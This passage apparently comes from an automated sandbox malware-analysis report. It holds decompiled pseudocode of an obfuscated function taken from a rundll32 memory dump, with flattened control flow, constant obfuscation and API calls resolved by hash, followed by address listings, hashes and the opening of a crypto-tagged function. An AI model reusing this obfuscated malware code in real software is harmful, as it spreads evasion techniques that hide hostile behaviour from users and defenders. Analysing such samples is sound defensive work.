				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E00687F1D(_v480, _t603, _v432, E00698606(_v440, 0x681560, __eflags), _v328, _v292 - _t603, _v488);
								E0068A8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E00687FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E0069DCF7(_v332, 0x6815c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E0068A42D(0xab2a8d8a, 0x2b7)))();
								E0068A8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E00690AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E006880E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E00687FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E00690AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E006880E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E00690AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E00690AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E006880E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E0068ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E00698519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E0069C0C1( &_v128, __eflags,  &_v288, E00698606(_v492, 0x681610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E0068A8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}






























































































                                                                                                                      0x0069f435
                                                                                                                      0x0069f43f
                                                                                                                      0x0069f446
                                                                                                                      0x0069f44a
                                                                                                                      0x0069f455
                                                                                                                      0x0069f460
                                                                                                                      0x0069f46b
                                                                                                                      0x0069f473
                                                                                                                      0x0069f47b
                                                                                                                      0x0069f483
                                                                                                                      0x0069f48b
                                                                                                                      0x0069f496
                                                                                                                      0x0069f49e
                                                                                                                      0x0069f4a9
                                                                                                                      0x0069f4b4
                                                                                                                      0x0069f4bf
                                                                                                                      0x0069f4ca
                                                                                                                      0x0069f4d2
                                                                                                                      0x0069f4dd
                                                                                                                      0x0069f4e5
                                                                                                                      0x0069f4ed
                                                                                                                      0x0069f4f5
                                                                                                                      0x0069f4fd
                                                                                                                      0x0069f505
                                                                                                                      0x0069f50d
                                                                                                                      0x0069f512
                                                                                                                      0x0069f51e
                                                                                                                      0x0069f527
                                                                                                                      0x0069f52c
                                                                                                                      0x0069f532
                                                                                                                      0x0069f53a
                                                                                                                      0x0069f545
                                                                                                                      0x0069f550
                                                                                                                      0x0069f55b
                                                                                                                      0x0069f566
                                                                                                                      0x0069f571
                                                                                                                      0x0069f57c
                                                                                                                      0x0069f587
                                                                                                                      0x0069f592
                                                                                                                      0x0069f59a
                                                                                                                      0x0069f59f
                                                                                                                      0x0069f5a4
                                                                                                                      0x0069f5ac
                                                                                                                      0x0069f5b4
                                                                                                                      0x0069f5bf
                                                                                                                      0x0069f5c7
                                                                                                                      0x0069f5c8
                                                                                                                      0x0069f5cf
                                                                                                                      0x0069f5da
                                                                                                                      0x0069f5e5
                                                                                                                      0x0069f5f0
                                                                                                                      0x0069f5f8
                                                                                                                      0x0069f603
                                                                                                                      0x0069f60e
                                                                                                                      0x0069f619
                                                                                                                      0x0069f624
                                                                                                                      0x0069f62f
                                                                                                                      0x0069f63a
                                                                                                                      0x0069f64d
                                                                                                                      0x0069f654
                                                                                                                      0x0069f65f
                                                                                                                      0x0069f667
                                                                                                                      0x0069f675
                                                                                                                      0x0069f679
                                                                                                                      0x0069f681
                                                                                                                      0x0069f689
                                                                                                                      0x0069f69c
                                                                                                                      0x0069f6a3
                                                                                                                      0x0069f6ae
                                                                                                                      0x0069f6bb
                                                                                                                      0x0069f6c6
                                                                                                                      0x0069f6d1
                                                                                                                      0x0069f6dc
                                                                                                                      0x0069f6e7
                                                                                                                      0x0069f6f2
                                                                                                                      0x0069f6fa
                                                                                                                      0x0069f705
                                                                                                                      0x0069f710
                                                                                                                      0x0069f71b
                                                                                                                      0x0069f723
                                                                                                                      0x0069f72e
                                                                                                                      0x0069f739
                                                                                                                      0x0069f744
                                                                                                                      0x0069f74f
                                                                                                                      0x0069f757
                                                                                                                      0x0069f765
                                                                                                                      0x0069f76a
                                                                                                                      0x0069f76e
                                                                                                                      0x0069f776
                                                                                                                      0x0069f77e
                                                                                                                      0x0069f789
                                                                                                                      0x0069f793
                                                                                                                      0x0069f794
                                                                                                                      0x0069f79b
                                                                                                                      0x0069f7a6
                                                                                                                      0x0069f7b1
                                                                                                                      0x0069f7bc
                                                                                                                      0x0069f7c7
                                                                                                                      0x0069f7cf
                                                                                                                      0x0069f7df
                                                                                                                      0x0069f7e3
                                                                                                                      0x0069f7eb
                                                                                                                      0x0069f7f3
                                                                                                                      0x0069f7fb
                                                                                                                      0x0069f800
                                                                                                                      0x0069f808
                                                                                                                      0x0069f810
                                                                                                                      0x0069f818
                                                                                                                      0x0069f820
                                                                                                                      0x0069f825
                                                                                                                      0x0069f82d
                                                                                                                      0x0069f838
                                                                                                                      0x0069f840
                                                                                                                      0x0069f84b
                                                                                                                      0x0069f856
                                                                                                                      0x0069f86a
                                                                                                                      0x0069f871
                                                                                                                      0x0069f87c
                                                                                                                      0x0069f887
                                                                                                                      0x0069f88f
                                                                                                                      0x0069f897
                                                                                                                      0x0069f8a2
                                                                                                                      0x0069f8aa
                                                                                                                      0x0069f8b7
                                                                                                                      0x0069f8bb
                                                                                                                      0x0069f8c3
                                                                                                                      0x0069f8cb
                                                                                                                      0x0069f8d3
                                                                                                                      0x0069f8db
                                                                                                                      0x0069f8e3
                                                                                                                      0x0069f8e8
                                                                                                                      0x0069f8f0
                                                                                                                      0x0069f8fb
                                                                                                                      0x0069f903
                                                                                                                      0x0069f90e
                                                                                                                      0x0069f919
                                                                                                                      0x0069f921
                                                                                                                      0x0069f929
                                                                                                                      0x0069f930
                                                                                                                      0x0069f938
                                                                                                                      0x0069f940
                                                                                                                      0x0069f947
                                                                                                                      0x0069f94a
                                                                                                                      0x0069f94b
                                                                                                                      0x0069f94f
                                                                                                                      0x0069f954
                                                                                                                      0x0069f958
                                                                                                                      0x0069f960
                                                                                                                      0x0069f968
                                                                                                                      0x0069f973
                                                                                                                      0x0069f97e
                                                                                                                      0x0069f989
                                                                                                                      0x0069f99c
                                                                                                                      0x0069f9a3
                                                                                                                      0x0069f9ae
                                                                                                                      0x0069f9b9
                                                                                                                      0x0069f9c1
                                                                                                                      0x0069f9c6
                                                                                                                      0x0069f9ca
                                                                                                                      0x0069f9cf
                                                                                                                      0x0069f9d7
                                                                                                                      0x0069f9e4
                                                                                                                      0x0069f9e8
                                                                                                                      0x0069f9ed
                                                                                                                      0x0069f9f2
                                                                                                                      0x0069f9fa
                                                                                                                      0x0069fa05
                                                                                                                      0x0069fa10
                                                                                                                      0x0069fa1b
                                                                                                                      0x0069fa26
                                                                                                                      0x0069fa31
                                                                                                                      0x0069fa3c
                                                                                                                      0x0069fa47
                                                                                                                      0x0069fa52
                                                                                                                      0x0069fa5d
                                                                                                                      0x0069fa68
                                                                                                                      0x0069fa73
                                                                                                                      0x0069fa7b
                                                                                                                      0x0069fa8b
                                                                                                                      0x0069fa8f
                                                                                                                      0x0069fa97
                                                                                                                      0x0069faa7
                                                                                                                      0x0069faab
                                                                                                                      0x0069fab0
                                                                                                                      0x0069fab5
                                                                                                                      0x0069fabd
                                                                                                                      0x0069fac5
                                                                                                                      0x0069facd
                                                                                                                      0x0069fad2
                                                                                                                      0x0069fada
                                                                                                                      0x0069fae2
                                                                                                                      0x0069faea
                                                                                                                      0x0069faf2
                                                                                                                      0x0069fafa
                                                                                                                      0x0069fb05
                                                                                                                      0x0069fb0d
                                                                                                                      0x0069fb18
                                                                                                                      0x0069fb25
                                                                                                                      0x0069fb29
                                                                                                                      0x0069fb31
                                                                                                                      0x0069fb39
                                                                                                                      0x0069fb41
                                                                                                                      0x0069fb49
                                                                                                                      0x0069fb4e
                                                                                                                      0x0069fb5c
                                                                                                                      0x0069fb62
                                                                                                                      0x0069fb6a
                                                                                                                      0x0069fb79
                                                                                                                      0x0069fb7c
                                                                                                                      0x0069fb83
                                                                                                                      0x0069fb87
                                                                                                                      0x0069fb8c
                                                                                                                      0x0069fb94
                                                                                                                      0x0069fbaa
                                                                                                                      0x0069fbb1
                                                                                                                      0x0069fbb8
                                                                                                                      0x0069fbc3
                                                                                                                      0x0069fbd0
                                                                                                                      0x0069fbd1
                                                                                                                      0x0069fbda
                                                                                                                      0x0069fbde
                                                                                                                      0x0069fbe6
                                                                                                                      0x0069fbee
                                                                                                                      0x0069fc03
                                                                                                                      0x0069fc07
                                                                                                                      0x0069fc0f
                                                                                                                      0x0069fc17
                                                                                                                      0x0069fc24
                                                                                                                      0x0069fc28
                                                                                                                      0x0069fc30
                                                                                                                      0x0069fc35
                                                                                                                      0x0069fc3d
                                                                                                                      0x0069fc45
                                                                                                                      0x0069fc4a
                                                                                                                      0x0069fc52
                                                                                                                      0x0069fc5a
                                                                                                                      0x0069fc62
                                                                                                                      0x0069fc67
                                                                                                                      0x0069fc6f
                                                                                                                      0x0069fc74
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc87
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069fc8d
                                                                                                                      0x0069ffc3
                                                                                                                      0x0069ffcc
                                                                                                                      0x0069ffd3
                                                                                                                      0x006a000b
                                                                                                                      0x006a001f
                                                                                                                      0x006a0024
                                                                                                                      0x006a0030
                                                                                                                      0x006a0032
                                                                                                                      0x00000000
                                                                                                                      0x006a0032
                                                                                                                      0x0069fc99
                                                                                                                      0x0069fdb2
                                                                                                                      0x0069fdc5
                                                                                                                      0x0069fdc6
                                                                                                                      0x0069fdcc
                                                                                                                      0x0069fdd4
                                                                                                                      0x0069fdd6
                                                                                                                      0x0069fddc
                                                                                                                      0x0069fde0
                                                                                                                      0x00000000
                                                                                                                      0x0069fde0
                                                                                                                      0x0069fca5
                                                                                                                      0x0069fd4c
                                                                                                                      0x0069fd55
                                                                                                                      0x0069fd60
                                                                                                                      0x0069fd75
                                                                                                                      0x0069fd76
                                                                                                                      0x0069fd77
                                                                                                                      0x0069fd78
                                                                                                                      0x0069fd8a
                                                                                                                      0x0069fd9c
                                                                                                                      0x0069fda1
                                                                                                                      0x0069fda4
                                                                                                                      0x0069fd0b
                                                                                                                      0x0069fd0b
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x00000000
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fcb1
                                                                                                                      0x0069fcb9
                                                                                                                      0x0069fcdd
                                                                                                                      0x0069fce2
                                                                                                                      0x0069fcea
                                                                                                                      0x0069fcfa
                                                                                                                      0x0069fcfb
                                                                                                                      0x0069fcfc
                                                                                                                      0x0069fcfe
                                                                                                                      0x0069fd03
                                                                                                                      0x0069fd08
                                                                                                                      0x0069fd08
                                                                                                                      0x00000000
                                                                                                                      0x0069fcbb
                                                                                                                      0x0069fcc1
                                                                                                                      0x00000000
                                                                                                                      0x0069fcc7
                                                                                                                      0x0069fcc7
                                                                                                                      0x00000000
                                                                                                                      0x0069fcc7
                                                                                                                      0x0069fcc1
                                                                                                                      0x0069ffc2
                                                                                                                      0x0069ffc2
                                                                                                                      0x0069ffc2
                                                                                                                      0x0069fd1b
                                                                                                                      0x0069fd2d
                                                                                                                      0x0069fd2e
                                                                                                                      0x0069fd2f
                                                                                                                      0x0069fd34
                                                                                                                      0x0069fd3d
                                                                                                                      0x0069fd3f
                                                                                                                      0x0069fd45
                                                                                                                      0x00000000
                                                                                                                      0x0069fd45
                                                                                                                      0x00000000
                                                                                                                      0x0069fd3f
                                                                                                                      0x0069fde8
                                                                                                                      0x0069fdee
                                                                                                                      0x0069ff6b
                                                                                                                      0x0069ff70
                                                                                                                      0x0069ff7e
                                                                                                                      0x0069ff8b
                                                                                                                      0x0069ff8c
                                                                                                                      0x0069ff8d
                                                                                                                      0x0069ff8f
                                                                                                                      0x0069ff94
                                                                                                                      0x0069ff98
                                                                                                                      0x0069ff9b
                                                                                                                      0x0069ffa0
                                                                                                                      0x00000000
                                                                                                                      0x0069fdf4
                                                                                                                      0x0069fdf4
                                                                                                                      0x0069fdfa
                                                                                                                      0x0069fede
                                                                                                                      0x0069fef5
                                                                                                                      0x0069fef7
                                                                                                                      0x0069ff00
                                                                                                                      0x0069ff02
                                                                                                                      0x0069ff04
                                                                                                                      0x0069ff06
                                                                                                                      0x0069ff0f
                                                                                                                      0x0069ff0f
                                                                                                                      0x0069ff11
                                                                                                                      0x0069ff13
                                                                                                                      0x0069ff15
                                                                                                                      0x0069ff18
                                                                                                                      0x0069ff18
                                                                                                                      0x0069ff18
                                                                                                                      0x0069ff2a
                                                                                                                      0x0069ff2f
                                                                                                                      0x0069ff3d
                                                                                                                      0x0069ff46
                                                                                                                      0x0069ff47
                                                                                                                      0x0069ff48
                                                                                                                      0x0069ff4a
                                                                                                                      0x0069ff4f
                                                                                                                      0x00000000
                                                                                                                      0x0069fe00
                                                                                                                      0x0069fe00
                                                                                                                      0x0069fe06
                                                                                                                      0x0069febe
                                                                                                                      0x0069fec3
                                                                                                                      0x0069fec7
                                                                                                                      0x0069feca
                                                                                                                      0x0069fecf
                                                                                                                      0x00000000
                                                                                                                      0x0069fe0c
                                                                                                                      0x0069fe0c
                                                                                                                      0x0069fe12
                                                                                                                      0x006a0049
                                                                                                                      0x00000000
                                                                                                                      0x006a004f
                                                                                                                      0x0069fe18
                                                                                                                      0x0069fe1a
                                                                                                                      0x00000000
                                                                                                                      0x0069fe20
                                                                                                                      0x0069fe20
                                                                                                                      0x0069fe2c
                                                                                                                      0x0069fe30
                                                                                                                      0x0069fe37
                                                                                                                      0x0069fe9a
                                                                                                                      0x0069fe9d
                                                                                                                      0x0069fea2
                                                                                                                      0x0069fea5
                                                                                                                      0x00000000
                                                                                                                      0x0069fea5
                                                                                                                      0x0069fe1a
                                                                                                                      0x0069fe06
                                                                                                                      0x0069fdfa
                                                                                                                      0x00000000
                                                                                                                      0x0069ffa5
                                                                                                                      0x0069ffa5
                                                                                                                      0x0069ffa5
                                                                                                                      0x0069ffb1
                                                                                                                      0x00000000
                                                                                                                      0x0069ffb1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                      • API String ID: 0-2624470838
                                                                                                                      • Opcode ID: 62bd00621aebcad38e8b4fa281a801665814cfb243a9ffa5054b2a720e6a3df1
                                                                                                                      • Instruction ID: 65f25d2eabd68cb014ff0e6440eaaa37d0345941124a276010e306f8fbd266e1
                                                                                                                      • Opcode Fuzzy Hash: 62bd00621aebcad38e8b4fa281a801665814cfb243a9ffa5054b2a720e6a3df1
                                                                                                                      • Instruction Fuzzy Hash: 305231715093818FD7B8CF25C58AB8BFBE2BBC5358F10891DE19996260DBB48949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068D6D8 Relevance: 9.2, Strings: 7, Instructions: 408COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0068D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
